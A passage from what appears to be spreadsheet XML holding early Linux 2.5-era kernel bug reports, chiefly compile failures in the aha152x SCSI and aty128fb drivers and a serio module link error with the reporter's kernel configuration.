has no member named `target' drivers/scsi/aha152x.c:2936: structure has no member named `lun' drivers/scsi/aha152x.c: In function `is_complete': drivers/scsi/aha152x.c:3056: structure has no member named `host' drivers/scsi/aha152x.c:3056: structure has no member named `target' drivers/scsi/aha152x.c:3056: structure has no member named `lun' drivers/scsi/aha152x.c: In function `show_command': drivers/scsi/aha152x.c:3379: structure has no member named `target' drivers/scsi/aha152x.c:3379: structure has no member named `lun' drivers/scsi/aha152x.c: In function `get_command': drivers/scsi/aha152x.c:3444: structure has no member named `target' drivers/scsi/aha152x.c:3444: structure has no member named `lun' make[1]: *** [drivers/scsi/aha152x.o] Error 1 make: *** [drivers/scsi/aha152x.o] Error 2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Athlon 850, 512MB RAM Software Environment: GNU Make 3.80, gcc 2.95.4 Problem Description: Compile fails, error below drivers/scsi/aha152x.c: In function `remove_lun_SC': drivers/scsi/aha152x.c:774: structure has no member named `target' drivers/scsi/aha152x.c:774: structure has no member named `lun' drivers/scsi/aha152x.c: In function `aha152x_internal_queue': drivers/scsi/aha152x.c:1479: structure has no member named `host' drivers/scsi/aha152x.c:1499: structure has no member named `host' drivers/scsi/aha152x.c:1499: structure has no member named `target' drivers/scsi/aha152x.c:1499: structure has no member named `lun' drivers/scsi/aha152x.c: In function `aha152x_abort': drivers/scsi/aha152x.c:1592: structure has no member named `host' drivers/scsi/aha152x.c:1597: structure has no member named `host' drivers/scsi/aha152x.c:1597: structure has no member named `target' drivers/scsi/aha152x.c:1597: structure has no member named `lun' drivers/scsi/aha152x.c:1635: structure has no member named `host' drivers/scsi/aha152x.c:1635: structure has no member named `target' drivers/scsi/aha152x.c:1635: structure has no member named `lun' drivers/scsi/aha152x.c: In function `timer_expired': drivers/scsi/aha152x.c:1644: structure has no member named `host' drivers/scsi/aha152x.c: In function `aha152x_device_reset': drivers/scsi/aha152x.c:1666: structure has no member named `host' drivers/scsi/aha152x.c:1679: structure has no member named `host' drivers/scsi/aha152x.c:1679: structure has no member named `target' drivers/scsi/aha152x.c:1679: structure has no member named `lun' drivers/scsi/aha152x.c:1684: structure has no member named `host' drivers/scsi/aha152x.c:1684: structure has no member named `host' drivers/scsi/aha152x.c:1685: structure has no member named `target' drivers/scsi/aha152x.c:1685: structure has no member named `target' drivers/scsi/aha152x.c:1686: structure has no member named `lun' drivers/scsi/aha152x.c:1686: structure has no member named `lun' drivers/scsi/aha152x.c: In function `aha152x_bus_reset': drivers/scsi/aha152x.c:1741: structure has no member named `host' drivers/scsi/aha152x.c: In function `aha152x_host_reset': drivers/scsi/aha152x.c:1825: structure has no member named `host' drivers/scsi/aha152x.c: In function `done': drivers/scsi/aha152x.c:1889: structure has no member named `host' drivers/scsi/aha152x.c:1889: structure has no member named `target' drivers/scsi/aha152x.c:1889: structure has no member named `lun' drivers/scsi/aha152x.c: In function `busfree_run': drivers/scsi/aha152x.c:2055: structure has no member named `host' drivers/scsi/aha152x.c:2055: structure has no member named `host' drivers/scsi/aha152x.c:2056: structure has no member named `target' drivers/scsi/aha152x.c:2056: structure has no member named `target' drivers/scsi/aha152x.c:2057: structure has no member named `lun' drivers/scsi/aha152x.c:2057: structure has no member named `lun' drivers/scsi/aha152x.c:2066: structure has no member named `host' drivers/scsi/aha152x.c:2066: structure has no member named `target' drivers/scsi/aha152x.c:2066: structure has no member named `lun' drivers/scsi/aha152x.c:2116: structure has no member named `target' drivers/scsi/aha152x.c: In function `seldo_run': drivers/scsi/aha152x.c:2148: structure has no member named `host' drivers/scsi/aha152x.c:2148: structure has no member named `target' drivers/scsi/aha152x.c:2148: structure has no member named `lun' drivers/scsi/aha152x.c:2155: structure has no member named `lun' drivers/scsi/aha152x.c:2161: structure has no member named `target' drivers/scsi/aha152x.c:2169: structure has no member named `target' drivers/scsi/aha152x.c:2172: structure has no member named `target' drivers/scsi/aha152x.c: In function `seldi_run': drivers/scsi/aha152x.c:2227: structure has no member named `host' drivers/scsi/aha152x.c:2227: structure has no member named `target' drivers/scsi/aha152x.c:2227: structure has no member named `lun' drivers/scsi/aha152x.c: In function `msgi_run': drivers/scsi/aha152x.c:2343: structure has no member named `host' drivers/scsi/aha152x.c:2343: structure has no member named `target' drivers/scsi/aha152x.c:2343: structure has no member named `lun' drivers/scsi/aha152x.c:2356: structure has no member named `target' drivers/scsi/aha152x.c:2357: structure has no member named `host' drivers/scsi/aha152x.c:2357: structure has no member named `target' drivers/scsi/aha152x.c:2357: structure has no member named `lun' drivers/scsi/aha152x.c:2358: structure has no member named `target' drivers/scsi/aha152x.c:2360: structure has no member named `host' drivers/scsi/aha152x.c:2360: structure has no member named `target' drivers/scsi/aha152x.c:2360: structure has no member named `lun' drivers/scsi/aha152x.c:2381: structure has no member named `host' drivers/scsi/aha152x.c:2381: structure has no member named `target' drivers/scsi/aha152x.c:2381: structure has no member named `lun' drivers/scsi/aha152x.c:2388: structure has no member named `host' drivers/scsi/aha152x.c:2388: structure has no member named `target' drivers/scsi/aha152x.c:2388: structure has no member named `lun' drivers/scsi/aha152x.c:2398: structure has no member named `host' drivers/scsi/aha152x.c:2398: structure has no member named `target' drivers/scsi/aha152x.c:2398: structure has no member named `lun' drivers/scsi/aha152x.c:2402: structure has no member named `target' drivers/scsi/aha152x.c:2418: structure has no member named `target' drivers/scsi/aha152x.c:2421: structure has no member named `host' drivers/scsi/aha152x.c:2421: structure has no member named `target' drivers/scsi/aha152x.c:2421: structure has no member named `lun' drivers/scsi/aha152x.c:2425: structure has no member named `target' drivers/scsi/aha152x.c:2426: structure has no member named `target' drivers/scsi/aha152x.c: In function `msgi_end': drivers/scsi/aha152x.c:2459: structure has no member named `host' drivers/scsi/aha152x.c:2459: structure has no member named `target' drivers/scsi/aha152x.c:2459: structure has no member named `lun' drivers/scsi/aha152x.c: In function `msgo_init': drivers/scsi/aha152x.c:2474: structure has no member named `target' drivers/scsi/aha152x.c:2474: structure has no member named `target' drivers/scsi/aha152x.c:2475: structure has no member named `lun' drivers/scsi/aha152x.c:2477: structure has no member named `host' drivers/scsi/aha152x.c:2477: structure has no member named `target' drivers/scsi/aha152x.c:2477: structure has no member named `lun' drivers/scsi/aha152x.c: In function `msgo_end': drivers/scsi/aha152x.c:2533: structure has no member named `host' drivers/scsi/aha152x.c:2533: structure has no member named `target' drivers/scsi/aha152x.c:2533: structure has no member named `lun' drivers/scsi/aha152x.c:2534: structure has no member named `target' drivers/scsi/aha152x.c:2535: structure has no member named `host' drivers/scsi/aha152x.c:2535: structure has no member named `target' drivers/scsi/aha152x.c:2535: structure has no member named `lun' drivers/scsi/aha152x.c:2536: structure has no member named `target' drivers/scsi/aha152x.c: In function `cmd_init': drivers/scsi/aha152x.c:2551: structure has no member named `host' drivers/scsi/aha152x.c:2551: structure has no member named `target' drivers/scsi/aha152x.c:2551: structure has no member named `lun' drivers/scsi/aha152x.c: In function `cmd_end': drivers/scsi/aha152x.c:2592: structure has no member named `host' drivers/scsi/aha152x.c:2592: structure has no member named `target' drivers/scsi/aha152x.c:2592: structure has no member named `lun' drivers/scsi/aha152x.c: In function `datai_run': drivers/scsi/aha152x.c:2659: structure has no member named `host' drivers/scsi/aha152x.c:2659: structure has no member named `target' drivers/scsi/aha152x.c:2659: structure has no member named `lun' drivers/scsi/aha152x.c:2672: structure has no member named `host' drivers/scsi/aha152x.c:2672: structure has no member named `target' drivers/scsi/aha152x.c:2672: structure has no member named `lun' drivers/scsi/aha152x.c:2714: structure has no member named `host' drivers/scsi/aha152x.c:2714: structure has no member named `target' drivers/scsi/aha152x.c:2714: structure has no member named `lun' drivers/scsi/aha152x.c:2735: structure has no member named `host' drivers/scsi/aha152x.c:2735: structure has no member named `target' drivers/scsi/aha152x.c:2735: structure has no member named `lun' drivers/scsi/aha152x.c:2742: structure has no member named `host' drivers/scsi/aha152x.c:2742: structure has no member named `target' drivers/scsi/aha152x.c:2742: structure has no member named `lun' drivers/scsi/aha152x.c: In function `datao_run': drivers/scsi/aha152x.c:2794: structure has no member named `host' drivers/scsi/aha152x.c:2794: structure has no member named `target' drivers/scsi/aha152x.c:2794: structure has no member named `lun' drivers/scsi/aha152x.c:2828: structure has no member named `host' drivers/scsi/aha152x.c:2828: structure has no member named `target' drivers/scsi/aha152x.c:2828: structure has no member named `lun' drivers/scsi/aha152x.c: In function `update_state': drivers/scsi/aha152x.c:2917: structure has no member named `host' drivers/scsi/aha152x.c:2917: structure has no member named `target' drivers/scsi/aha152x.c:2917: structure has no member named `lun' drivers/scsi/aha152x.c: In function `parerr_run': drivers/scsi/aha152x.c:2936: structure has no member named `host' drivers/scsi/aha152x.c:2936: structure has no member named `target' drivers/scsi/aha152x.c:2936: structure has no member named `lun' drivers/scsi/aha152x.c: In function `is_complete': drivers/scsi/aha152x.c:3056: structure has no member named `host' drivers/scsi/aha152x.c:3056: structure has no member named `target' drivers/scsi/aha152x.c:3056: structure has no member named `lun' drivers/scsi/aha152x.c: In function `show_command': drivers/scsi/aha152x.c:3379: structure has no member named `target' drivers/scsi/aha152x.c:3379: structure has no member named `lun' drivers/scsi/aha152x.c: In function `get_command': drivers/scsi/aha152x.c:3444: structure has no member named `target' drivers/scsi/aha152x.c:3444: structure has no member named `lun' make[2]: *** [drivers/scsi/aha152x.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: patched 2.5.59 to 2.5.60 reconfigured through make menuconfig, recompiled. Compile fails with above error. Compile still fails in 2.5.62.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution:rawhide Hardware Environment: LX164/alpha Software Environment: redhat Problem Description: the driver aty128fb.c aka DRI for ATI Rage pro fails to compile due to logic error in aty128fb_setup there are 3 #define cases each is for mac, intel , or ppc. there is an 4th case for default purposes. The logic is constructed so that it's an if else logic tree, find a good case short circuit around the rest. The problem is if one of the three conditions don't apply then there is an else with no if. I restructured the code so now it uses continues. Same speed fewer indentions and it will now compile. patch will be include in followup. Steps to reproduce: select XFree 4.1 DRI modules. select an non PPC no Intel hardware select ATI Rage 128 DRI driver compile.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: athlon 1200. 256 Mb ram Software Environment: alberto@cacharrito:~$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-linux/3.2.3/specs Configured with: ../src/configure -v --enable-languages=c,c++,java,f77,objc,ada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux Thread model: posix gcc version 3.2.3 20030415 (Debian prerelease) Problem Description: When serio.o is compiled as a modules, compilation fails: LD .tmp_vmlinux1 drivers/built-in.o(.text+0x57a9d): In function `atkbd_interrupt': : referencia a `serio_rescan' sin definir drivers/built-in.o(.text+0x58183): In function `atkbd_disconnect': : referencia a `serio_close' sin definir drivers/built-in.o(.text+0x582a2): In function `atkbd_connect': : referencia a `serio_open' sin definir drivers/built-in.o(.text+0x5844b): In function `atkbd_connect': : referencia a `serio_close' sin definir drivers/built-in.o(.init.text+0x673b): In function `atkbd_init': : referencia a `serio_register_device' sin definir drivers/built-in.o(.exit.text+0x1bb): In function `atkbd_exit': : referencia a `serio_unregister_device' sin definir make: *** [.tmp_vmlinux1] Error 1 When compiled inside the core, it compiles ok. But after the kernel boots, both the mouse and keyboard fail to answer. I just can do ctrl+alt+fn to switch consoles, and ctrl+alt+supr to reboot (magic keys?) Steps to reproduce: My .config: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y # # Loadable module support # CONFIG_MODULES=y # CONFIG_MODULE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y # CONFIG_MODVERSIONS is not set CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y # CONFIG_X86_UP_APIC is not set CONFIG_X86_TSC=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set # CONFIG_MTRR is not set CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI Support # # CONFIG_ACPI is not set CONFIG_APM=m # CONFIG_APM_IGNORE_USER_SUSPEND is not set # CONFIG_APM_DO_ENABLE is not set # CONFIG_APM_CPU_IDLE is not set # CONFIG_APM_DISPLAY_BLANK is not set # CONFIG_APM_RTC_IS_GMT is not set # CONFIG_APM_ALLOW_INTS is not set # CONFIG_APM_REAL_MODE_POWER_OFF is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # CONFIG_HOTPLUG is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Generic Driver Options # # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_OTHER is not set # CONFIG_PARPORT_1284 is not set # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # # CONFIG_ISAPNP is not set # CONFIG_PNPBIOS is not set # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=m # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 # CONFIG_BLK_DEV_INITRD is not set # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set # CONFIG_BLK_DEV_IDECD is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set CONFIG_BLK_DEV_IDESCSI=m # CONFIG_IDE_TASK_IOCTL is not set # CONFIG_IDE_TASKFILE_IO is not set # # IDE chipset support/bugfixes # CONFIG_BLK_DEV_CMD640=y # CONFIG_BLK_DEV_CMD640_ENHANCED is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_DMA_NONPCI is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=m # CONFIG_BLK_DEV_SR_VENDOR is not set CONFIG_CHR_DEV_SG=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_REPORT_LUNS=y CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_SYM53C8XX is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # CONFIG_I2O=m CONFIG_I2O_PCI=m # CONFIG_I2O_BLOCK is not set # CONFIG_I2O_SCSI is not set CONFIG_I2O_PROC=m # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # CONFIG_IPV6 is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_NETFILTER is not set # CONFIG_XFRM_USER is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # CONFIG_NET_SB1000 is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set CONFIG_NE2K_PCI=m # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=m CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=m # CONFIG_MOUSE_SERIAL is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # # CONFIG_SERIAL_8250 is not set # # Non-8250 serial port support # # CONFIG_UNIX98_PTYS is not set # CONFIG_PRINTER is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # CONFIG_I2C=m CONFIG_I2C_ALGOBIT=m # CONFIG_I2C_PROSAVAGE is not set # CONFIG_I2C_PHILIPSPAR is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_ALGOPCF is not set CONFIG_I2C_CHARDEV=m # # I2C Hardware Sensors Mainboard support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_NFORCE2 is not set # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_VIAPRO is not set # # I2C Hardware Sensors Chip support # # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_IT87 is not set # CONFIG_SENSORS_LM75 is not set # CONFIG_SENSORS_LM85 is not set # CONFIG_SENSORS_LM78 is not set # CONFIG_SENSORS_VIA686A is not set # CONFIG_SENSORS_W83781D is not set # CONFIG_I2C_SENSOR is not set # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set CONFIG_RTC=m # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD_8151 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set CONFIG_AGP_VIA=y CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set CONFIG_DRM_R128=m # CONFIG_DRM_RADEON is not set # CONFIG_DRM_MGA is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # CONFIG_VIDEO_DEV=m # # Video For Linux # CONFIG_VIDEO_PROC_FS=y # # Video Adapters # CONFIG_VIDEO_BT848=m # CONFIG_VIDEO_BWQCAM is not set # CONFIG_VIDEO_CQCAM is not set # CONFIG_VIDEO_CPIA is not set # CONFIG_VIDEO_SAA5249 is not set # CONFIG_TUNER_3036 is not set # CONFIG_VIDEO_STRADIS is not set # CONFIG_VIDEO_ZORAN is not set # CONFIG_VIDEO_ZR36120 is not set # CONFIG_VIDEO_SAA7134 is not set # CONFIG_VIDEO_MXB is not set # CONFIG_VIDEO_DPC is not set # CONFIG_VIDEO_HEXIUM_ORION is not set # CONFIG_VIDEO_HEXIUM_GEMINI is not set # # Radio Adapters # # CONFIG_RADIO_GEMTEK_PCI is not set # CONFIG_RADIO_MAXIRADIO is not set # CONFIG_RADIO_MAESTRO is not set # # Digital 